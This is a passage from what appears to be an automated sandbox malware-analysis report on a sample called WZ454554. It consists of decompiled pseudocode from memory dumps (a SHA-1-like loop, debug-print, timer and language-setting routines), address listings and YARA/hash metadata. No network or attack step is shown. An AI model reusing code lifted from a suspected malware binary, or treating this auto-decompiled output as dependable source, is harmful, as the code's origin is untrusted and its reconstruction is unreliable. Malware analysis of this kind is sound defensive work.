					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                            0x00409e6b
                            0x00409e6f
                            0x00409e71
                            0x00409e71
                            0x00409e74
                            0x00409e96
                            0x00409ebc
                            0x00409ee2
                            0x00409f04
                            0x00409f0b
                            0x00409f0e
                            0x00409f11
                            0x00409f1a
                            0x00409f20
                            0x00409f27
                            0x00409f38
                            0x00409f3b
                            0x00409f3e
                            0x00409f42
                            0x00409f44
                            0x00409f46
                            0x00409f4f
                            0x00409f52
                            0x00409f55
                            0x00409f60
                            0x00409f66
                            0x00409f68
                            0x00409f68
                            0x00409f6b
                            0x00409f6e
                            0x00409f6e
                            0x00409f73
                            0x00409f75
                            0x00409f78
                            0x00409f7b
                            0x00409f81
                            0x00409f84
                            0x00409f87
                            0x00409f90
                            0x00409f96
                            0x00409f9f
                            0x00409fae
                            0x00409fb5
                            0x00409fb8
                            0x00409fbb
                            0x00409fc4
                            0x00409fc7
                            0x00409fca
                            0x00409fe2
                            0x00409fe9
                            0x00409feb
                            0x00409fee
                            0x00409ff1
                            0x00409ffa
                            0x0040a001
                            0x0040a004
                            0x0040a007
                            0x0040a016
                            0x0040a01d
                            0x0040a020
                            0x0040a023
                            0x0040a02c
                            0x0040a036
                            0x0040a039
                            0x0040a045
                            0x0040a048
                            0x0040a04f
                            0x0040a052
                            0x0040a055
                            0x0040a05a
                            0x0040a05d
                            0x0040a066
                            0x0040a077
                            0x0040a07a
                            0x0040a07d
                            0x0040a084
                            0x0040a087
                            0x0040a08a
                            0x0040a08d
                            0x0040a08f
                            0x0040a092
                            0x0040a095
                            0x0040a09e
                            0x0040a0a3
                            0x0040a0a3
                            0x0040a0b8
                            0x0040a0bb
                            0x0040a0be
                            0x0040a0c5
                            0x0040a0c8
                            0x0040a0cb
                            0x0040a0e0
                            0x0040a0e7
                            0x0040a0ea
                            0x0040a0ee
                            0x0040a0f1
                            0x0040a0f6
                            0x0040a0f9
                            0x0040a108
                            0x0040a10b
                            0x0040a112
                            0x0040a115
                            0x0040a118
                            0x0040a11b
                            0x0040a11e
                            0x0040a126
                            0x0040a134
                            0x0040a137
                            0x0040a13a
                            0x0040a13a
                            0x0040a141
                            0x0040a144
                            0x0040a147
                            0x0040a14f
                            0x0040a15d
                            0x0040a160
                            0x0040a167
                            0x0040a16a
                            0x0040a16d
                            0x0040a170
                            0x0040a173
                            0x0040a17c
                            0x0040a183
                            0x0040a183
                            0x0040a189
                            0x0040a1a2
                            0x0040a1a5
                            0x0040a1ac
                            0x0040a1af
                            0x0040a1b2
                            0x0040a1c4
                            0x0040a1ce
                            0x0040a1d1
                            0x0040a1da
                            0x0040a1dd
                            0x0040a1e4
                            0x0040a1e7
                            0x0040a1ed
                            0x0040a200
                            0x0040a207
                            0x0040a20a
                            0x0040a20d
                            0x0040a210
                            0x0040a219
                            0x0040a21c
                            0x0040a22f
                            0x0040a232
                            0x0040a23c
                            0x0040a23f
                            0x0040a241
                            0x0040a24a
                            0x0040a24d
                            0x0040a260
                            0x0040a266
                            0x0040a269
                            0x0040a270
                            0x0040a272
                            0x0040a275
                            0x0040a278
                            0x0040a27b
                            0x0040a27e
                            0x0040a281
                            0x0040a28a
                            0x0040a28f
                            0x0040a292
                            0x0040a292
                            0x0040a2a5
                            0x0040a2a8
                            0x0040a2ab
                            0x0040a2b2
                            0x0040a2b5
                            0x0040a2b8
                            0x0040a2bb
                            0x0040a2ce
                            0x0040a2d1
                            0x0040a2dc
                            0x0040a2df
                            0x0040a2eb
                            0x0040a2ee
                            0x0040a2f4
                            0x0040a2f7
                            0x0040a2fa
                            0x0040a301
                            0x0040a311
                            0x0040a314
                            0x0040a31a
                            0x0040a31d
                            0x0040a324
                            0x0040a326
                            0x0040a329
                            0x0040a32c
                            0x0040a32f
                            0x0040a332
                            0x0040a339
                            0x0040a348
                            0x0040a34b
                            0x0040a352
                            0x0040a355
                            0x0040a358
                            0x0040a35b
                            0x0040a35e
                            0x0040a361
                            0x0040a364
                            0x0040a36d
                            0x0040a37e
                            0x0040a386
                            0x0040a38c
                            0x0040a38f
                            0x0040a391
                            0x0040a394
                            0x0040a397
                            0x0040a3a4

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (
                            • API String ID: 0-3887548279
                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                            • Instruction ID: 5e5443ef098d349f7e33f9aecf6f08398bbbeee53fd6575e54cb3400f46edf1b
                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                            • Instruction Fuzzy Hash: C7021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ABB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00ABB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xb8f7a8);
				E00B0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00B0D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00AFD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00AFF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00B0DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00AFB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L00AFB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00AFE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00AFA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                            0x00abb171
                            0x00abb171
                            0x00abb171
                            0x00abb171
                            0x00abb171
                            0x00abb176
                            0x00abb17b
                            0x00abb180
                            0x00abb186
                            0x00abb18f
                            0x00abb198
                            0x00abb1a4
                            0x00abb1aa
                            0x00b14802
                            0x00b14802
                            0x00b14805
                            0x00b1480c
                            0x00b1480e
                            0x00abb1d1
                            0x00abb1d3
                            0x00abb1de
                            0x00abb1de
                            0x00b14817
                            0x00b1481e
                            0x00b14820
                            0x00b14822
                            0x00b14822
                            0x00b14824
                            0x00b14824
                            0x00b1482a
                            0x00000000
                            0x00000000
                            0x00b14835
                            0x00b1483a
                            0x00b1483d
                            0x00b1483f
                            0x00b14842
                            0x00b14842
                            0x00b14842
                            0x00b14846
                            0x00b1484c
                            0x00b1484e
                            0x00b14851
                            0x00b14851
                            0x00b14853
                            0x00b14854
                            0x00b14854
                            0x00b14858
                            0x00b1485a
                            0x00b1485a
                            0x00b1485d
                            0x00b1485f
                            0x00b14861
                            0x00b14861
                            0x00b14866
                            0x00b1486b
                            0x00b1486e
                            0x00b14871
                            0x00b14876
                            0x00b14876
                            0x00b14878
                            0x00b1487b
                            0x00b14884
                            0x00b14884
                            0x00000000
                            0x00b1487d
                            0x00b1487d
                            0x00b14882
                            0x00b14889
                            0x00b14889
                            0x00b1488f
                            0x00b14891
                            0x00b148e0
                            0x00b148e2
                            0x00b148e4
                            0x00b148e4
                            0x00b148e7
                            0x00b148e7
                            0x00b148ed
                            0x00b148f4
                            0x00b148f6
                            0x00b14951
                            0x00b14951
                            0x00b14953
                            0x00b14953
                            0x00b14956
                            0x00b14956
                            0x00b14958
                            0x00b14959
                            0x00b14959
                            0x00b1495d
                            0x00b1495d
                            0x00b1495f
                            0x00b1495f
                            0x00b14965
                            0x00b14969
                            0x00b149ba
                            0x00b149ba
                            0x00b149c1
                            0x00b149c5
                            0x00b149cc
                            0x00b149d4
                            0x00b149d7
                            0x00b149da
                            0x00b149e4
                            0x00b149e5
                            0x00b149f3
                            0x00b14a02
                            0x00000000
                            0x00b14a02
                            0x00b14972
                            0x00b14974
                            0x00000000
                            0x00000000
                            0x00b14976
                            0x00b14979
                            0x00b14982
                            0x00b14983
                            0x00b14984
                            0x00b1498b
                            0x00b1498d
                            0x00b14991
                            0x00b14993
                            0x00b14999
                            0x00b1499d
                            0x00b149a2
                            0x00b149a2
                            0x00b149a2
                            0x00b14999
                            0x00b149ac
                            0x00000000
                            0x00b149b3
                            0x00b148f8
                            0x00b148fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b148fe
                            0x00b14895
                            0x00b1489c
                            0x00b148ad
                            0x00b148b2
                            0x00b148b5
                            0x00b148b7
                            0x00b148ba
                            0x00b148bc
                            0x00b148c6
                            0x00b148c6
                            0x00b148cb
                            0x00b148d1
                            0x00b148d4
                            0x00b148d8
                            0x00b148d8
                            0x00000000
                            0x00b148d8
                            0x00b148be
                            0x00b148c0
                            0x00000000
                            0x00000000
                            0x00b148c2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b148c4
                            0x00000000
                            0x00b14882
                            0x00b1487b
                            0x00b14904
                            0x00b14906
                            0x00000000
                            0x00000000
                            0x00b14908
                            0x00b1490e
                            0x00000000
                            0x00000000
                            0x00b14910
                            0x00b14917
                            0x00b14917
                            0x00000000
                            0x00b14917
                            0x00abb1ba
                            0x00b147f9
                            0x00b147fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b147fc
                            0x00abb1c0
                            0x00abb1c0
                            0x00abb1c3
                            0x00abb1cb
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: _vswprintf_s
                            • String ID:
                            • API String ID: 677850445-0
                            • Opcode ID: c7cedf569e2bb870b822c53a4b71659bbdbb9155cd947c700c48632e824db9bb
                            • Instruction ID: 084c5a426be937cd40a67ea408c65daea5e25c45b32c2fd211ea96ce35fe6836
                            • Opcode Fuzzy Hash: c7cedf569e2bb870b822c53a4b71659bbdbb9155cd947c700c48632e824db9bb
                            • Instruction Fuzzy Hash: 5051CE71D102598EDF20CF68C945BFEBBF0EF05710F6042E9E859AB282D7704D858B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E00ADB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xbad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(L00AD7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							L00B88CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L00AF9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L00AFB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L00AFCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(L00AD7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L00B88F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L00AFAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xba8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xba862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xba8628; // 0x0
							_t116 =  *0xba862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                            0x00adb94c
                            0x00adb956
                            0x00adb95c
                            0x00adb95e
                            0x00adb964
                            0x00adb969
                            0x00adb96d
                            0x00adb96d
                            0x00adb970
                            0x00adb974
                            0x00adb97a
                            0x00adbadf
                            0x00adbadf
                            0x00adbae2
                            0x00adbae4
                            0x00adbae6
                            0x00adbaf0
                            0x00b22cb8
                            0x00adbaf6
                            0x00adbaf6
                            0x00adbaf6
                            0x00adbafd
                            0x00adbb1f
                            0x00adbb1f
                            0x00adbaff
                            0x00adbb00
                            0x00adbb00
                            0x00adbb03
                            0x00adbb03
                            0x00adbacb
                            0x00adbacf
                            0x00adbad0
                            0x00adbad1
                            0x00adbadc
                            0x00adbadc
                            0x00adb980
                            0x00adb980
                            0x00adb988
                            0x00adb98b
                            0x00adb98d
                            0x00adb990
                            0x00adb993
                            0x00adb999
                            0x00adb99b
                            0x00adb9a1
                            0x00adb9a5
                            0x00adb9aa
                            0x00adb9b0
                            0x00adb9bb
                            0x00adb9c0
                            0x00adb9c3
                            0x00adb9ca
                            0x00adb9cc
                            0x00adb9cf
                            0x00adb9d3
                            0x00adb9d7
                            0x00adba94
                            0x00adba94
                            0x00adba98
                            0x00adbaa3
                            0x00b22ccb
                            0x00adbaa9
                            0x00adbaa9
                            0x00adbaa9
                            0x00adbab1
                            0x00b22cd5
                            0x00b22cdd
                            0x00b22cdd
                            0x00adbabb
                            0x00adbabc
                            0x00adbac2
                            0x00adbac3
                            0x00adbac3
                            0x00adbac6
                            0x00000000
                            0x00adb9dd
                            0x00adb9dd
                            0x00adb9e7
                            0x00adb9e7
                            0x00adb9ec
                            0x00adb9ec
                            0x00adb9f1
                            0x00adb9f5
                            0x00adb9fa
                            0x00adba00
                            0x00adba0c
                            0x00adba10
                            0x00adba10
                            0x00adba12
                            0x00adba18
                            0x00000000
                            0x00000000
                            0x00adbb26
                            0x00adbb26
                            0x00adba1e
                            0x00adba1e
                            0x00adba23
                            0x00adba25
                            0x00adba2c
                            0x00adba30
                            0x00adba35
                            0x00adba35
                            0x00adba41
                            0x00adba46
                            0x00adba4c
                            0x00adba50
                            0x00adba54
                            0x00adba6a
                            0x00adba6e
                            0x00adba70
                            0x00adba74
                            0x00adba78
                            0x00adba7a
                            0x00adba7c
                            0x00adba8e
                            0x00adba90
                            0x00adba92
                            0x00adbb14
                            0x00adbb14
                            0x00adbb16
                            0x00adbb16
                            0x00000000
                            0x00adba7c
                            0x00adbb0a
                            0x00adbb0d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00adbb0f

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ADB9A5
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 885266447-0
                            • Opcode ID: da7d52b29a6f03080b7835ce0f28fae6cfe0d523e3b85c47f9718aa24ae684db
                            • Instruction ID: 5d10523dcd0efac1e3c9b27ffc26a79953984d3348af569974157a1f27a0d8e7
                            • Opcode Fuzzy Hash: da7d52b29a6f03080b7835ce0f28fae6cfe0d523e3b85c47f9718aa24ae684db
                            • Instruction Fuzzy Hash: 78511571A18341CFC720DF29C58092ABBE5FB88750F65496EF68687365DB70EC44CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E00AEFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					L00ACEEF0(0xba7b60);
					_t134 =  *0xba7b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xba7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xba7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = L00AC6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														L00AC76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00B58938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00ABB150();
													}
													_t116 = L00B56D81(_t176,  &_v16);
